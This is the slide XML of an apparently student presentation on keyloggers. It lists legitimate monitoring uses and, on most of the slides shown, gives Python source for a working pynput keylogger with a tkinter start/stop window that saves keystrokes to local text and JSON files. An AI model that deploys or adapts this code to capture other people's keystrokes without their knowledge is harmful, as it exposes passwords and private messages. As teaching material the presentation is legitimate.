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d839f967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6d839f967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KEYLOGGERS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PAVITHRA V, Kings Engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>College</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, CSE</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-Department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IN" sz="2000"/>
              <a:t>By employers to observe employees computer activities. By parents to supervise their children’s internet usage. By device owners to track possible unauthorized activity on their devices.</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-206121" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;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0" name="Google Shape;160;p2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5"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940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  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IN"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IN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100 MB free disk space, Pentium II processor, 512 MB RAM</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="0F0F0F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="960"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1656"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.ywin32 ,p.yhook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IN" sz="1400"/>
              <a:t>Data Input:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920" rtl="0" algn="l">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IN" sz="1400"/>
              <a:t>Training Process:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920" rtl="0" algn="l">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IN" sz="1400"/>
              <a:t>Prediction Process:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920" rtl="0" algn="l">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686025" y="1118250"/>
            <a:ext cx="11029500" cy="393750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spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>import tkinter as tk</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>from tkinter import *</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>from pynput import keyboard</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>import json</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keys_used = []</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>flag = False</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>keys = ""</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generate_text_log(key):</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        keys.write(key)</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generate_json_file(keys_used):</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    with open('key_log.json', '+wb') as key_log:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        key_list_bytes = json.dumps(keys_used).encode()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        key_log.write(key_list_bytes)</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on_press(key):</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    if flag == False:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        )</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        flag = True</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    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        )</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    generate_json_file(keys_used)</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on_release(key):</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    )</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    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        flag = False</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    generate_json_file(keys_used)</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    keys = keys + str(key)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    generate_text_log(str(keys))</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="92000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1231075" y="1428500"/>
            <a:ext cx="108777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700">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Libre Franklin"/>
                <a:ea typeface="Libre Franklin"/>
                <a:cs typeface="Libre Franklin"/>
                <a:sym typeface="Libre Franklin"/>
              </a:rPr>
              <a:t>i</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1" name="Google Shape;141;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581250" y="1232550"/>
            <a:ext cx="11029500" cy="3937500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit fontScale="32500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>def start_keylogger():</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    listener = keyboard.Listener(on_press=on_press, on_release=on_release)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    listener.start()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    start_button.config(state='disabled')</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    stop_button.config(state='normal')</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stop_keylogger():</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    listener.stop()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    label.config(text="Keylogger stopped.")</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    start_button.config(state='normal')</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    stop_button.config(state='disabled')</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root = Tk()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
